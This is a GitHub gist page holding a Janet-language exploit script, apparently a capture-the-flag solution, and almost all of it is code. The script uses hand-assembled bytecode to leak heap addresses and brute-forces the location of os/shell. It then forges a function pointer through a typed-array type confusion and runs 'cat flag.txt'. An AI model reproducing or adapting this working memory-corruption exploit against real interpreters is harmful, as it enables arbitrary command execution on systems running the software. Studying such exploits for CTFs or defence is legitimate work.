Last active
April 1, 2021 04:10
-
-
Save lionaneesh/0a15c092715c41b968f04279ae82e528 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| (def some | |
| (asm | |
| '{ | |
| constants @["blah" print] | |
| :arity 0 | |
| slotcount 2 | |
| bytecode @[(lds 0) (ldc 1 0) (push 1) (ldc 1 1) (mkarr 2) (ret 2)] | |
| } | |
| )) | |
| (def- leak_tup (some)) | |
| (print leak_tup) | |
| (def- leak_str (describe leak_tup)) | |
| (def leak_addr (string/trim leak_str "<>array ")) | |
| (def leak_addr1 (string/slice leak_addr 2 6)) | |
| (def leak_addr2 (string/slice leak_addr 6 14)) | |
| (def hex_p "0x") | |
| (print leak_addr) | |
| (print leak_addr1) | |
| (print leak_addr2) | |
| (def leak_addr2h (string/join [hex_p leak_addr2])) | |
| (def leak_addr1h (string/join [hex_p leak_addr1])) | |
| (print leak_addr2h) | |
| (print leak_addr1h) | |
| (def leak_addr2i (scan-number leak_addr2h)) | |
| (def leak_addr1i (scan-number leak_addr1h)) | |
| (def leak_program_ptr2 (- leak_addr2i 387504)) | |
| (def leak_program_ptr1 (bor 0xfffe8000 leak_addr1i)) | |
| (print leak_program_ptr1) | |
| (def- buffer (tarray/buffer 8)) | |
| (def- buffleak2 (buffer/new 16)) | |
| (def- progleak (buffer/new 16)) | |
| (buffer/format buffleak2 "0x%x%x" leak_addr1i leak_program_ptr2) | |
| (print "heapbase") | |
| (print buffleak2) | |
| # heapbase leaked, now lets brute the program base and eventually the os/shell | |
| (def leak_pre (string/slice buffleak2 2 7)) | |
| (def leak_suf (string/slice buffleak2 11 14)) | |
| (def leak_preh (string/join [hex_p leak_pre])) | |
| (def leak_sufh (string/join [hex_p leak_suf])) | |
| (def leak_prei (scan-number leak_preh)) | |
| (def leak_sufi (scan-number leak_sufh)) | |
| (var found nil) | |
| (loop [leak_mid :range [0x0 0xFFFF] | |
| :until (not= found nil) | |
| ] | |
| # brute leak mid and try to generate possible addresses for os/shell | |
| (def- buffleak3 (buffer/new 16)) | |
| (buffer/format buffleak3 "0x%x%.4x%.3x" leak_prei leak_mid leak_sufi) | |
| (def leak_prog_1 (string/slice buffleak3 2 8)) | |
| (def leak_prog_1h (string/join [hex_p leak_prog_1])) | |
| (def leak_prog_1i (scan-number leak_prog_1h)) | |
| (def leak_prog_2 (string/slice buffleak3 8 14)) | |
| (def leak_prog_2h (string/join [hex_p leak_prog_2])) | |
| (def leak_prog_2i (scan-number leak_prog_2h)) | |
| (def leak_prog_2f (+ leak_prog_2i 127456)) # os_shell = progbase + 127456 | |
| (def leak_prog_f (buffer/new 16)) | |
| (buffer/format leak_prog_f "0x%x%.6x" leak_prog_1i leak_prog_2f) | |
| # now convert the address into buffer-float-view to create a forged function pointer | |
| (def leak_prog_addr1 (string/slice leak_prog_f 2 6)) | |
| (def leak_prog_addr2 (string/slice leak_prog_f 6 14)) | |
| (def hex_p "0x") | |
| (def leak_prog_addr2h (string/join [hex_p leak_prog_addr2])) | |
| (def leak_prog_addr1h (string/join [hex_p leak_prog_addr1])) | |
| (def leak_prog_addr2i (scan-number leak_prog_addr2h)) | |
| (def leak_prog_addr1i (scan-number leak_prog_addr1h)) | |
| (def- leak_prog_ptr1e (buffer/new 8)) | |
| (def leak_prog_addr1ie (bor 0x8000 leak_prog_addr1i)) | |
| (def- leak_prog_part1 (scan-number (buffer/format leak_prog_ptr1e "0x%x%x" 0xfffe leak_prog_addr1ie))) | |
| (def- buffer-float64-view (tarray/new :float64 1 1 0 buffer)) | |
| (def- buffer-uint32-view (tarray/new :uint32 2 1 0 buffer)) | |
| (set (buffer-uint32-view 1) leak_prog_part1) | |
| (set (buffer-uint32-view 0) leak_prog_addr2i) | |
| (set found (string/find "shell" (describe (buffer-float64-view 0)))) | |
| (if (not= found nil) | |
| ((buffer-float64-view 0) "cat flag.txt") | |
| ) | |
| ) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment